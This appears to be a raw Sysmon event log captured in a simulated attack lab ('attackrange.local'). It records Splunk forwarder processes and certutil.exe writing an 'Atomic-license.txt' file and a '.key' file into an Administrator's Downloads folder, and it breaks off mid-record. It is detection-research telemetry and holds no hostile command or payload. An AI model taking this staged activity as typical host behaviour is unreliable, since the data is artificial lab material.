23542300x8000000000000000293063Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.955{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA4AD8C075206434576F25169477121C,SHA256=97214352FB6ADA8E7B2BB4362EFBA957C4DFB8DA985B0C2C638207F9F337651F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441480Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:27.681{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9DFBB864CFD4378EEDEB7199463F284,SHA256=589DE4E722DE485BCECA10CEC4B5C2C629FAF140A01594753277646A70C09C32,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293062Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.333{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50657-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000293061Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.416{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-02B7-6088-1A2A-00000000BB01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293060Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.416{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293059Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.416{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293058Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.416{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293057Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.416{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293056Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.416{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-02B7-6088-1A2A-00000000BB01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293055Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.416{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-02B7-6088-1A2A-00000000BB01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000293054Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.301{BEA10069-02B7-6088-1A2A-00000000BB01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293053Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.037{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A91EAFADAC691E52536A1047F08DBCC7,SHA256=99ECB544FA7C20F982523CE9188A13FE86B44D226E1E766AFB8A04317D28F875,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441479Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:27.253{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441478Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:27.253{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441484Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:28.686{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D26057086FF8C52E7C9BFF01750B0085,SHA256=F616268F85047494E3FE7DED4AA7B92727F7A46BD5302357F0C1BAD00E972F04,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293097Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.572{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293096Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.556{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293095Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.556{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000293094Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localDownloads2021-04-27 12:25:28.556{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exeC:\Users\Administrator\Downloads\Atomic-license.txt2021-04-27 12:25:28.556 11241100x8000000000000000293093Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localDownloads2021-04-27 12:25:28.556{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exeC:\Users\Administrator\Downloads\2d2a313164ae3a724cc53b0c8e104dd6053f8402.key2021-04-27 12:25:28.556 10341000x8000000000000000293092Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.518{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293091Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.371{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F2854C50431F8BF8156EAD196594195,SHA256=06FCCA31629F192D0AE6A669B6E92E1B2C952772A4AEAE0E78A28CC539F2B7B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293090Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.340{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293089Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.340{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293088Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.318{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293087Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.318{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293086Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293085Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293084Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293083Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293082Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293081Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293080Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293079Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 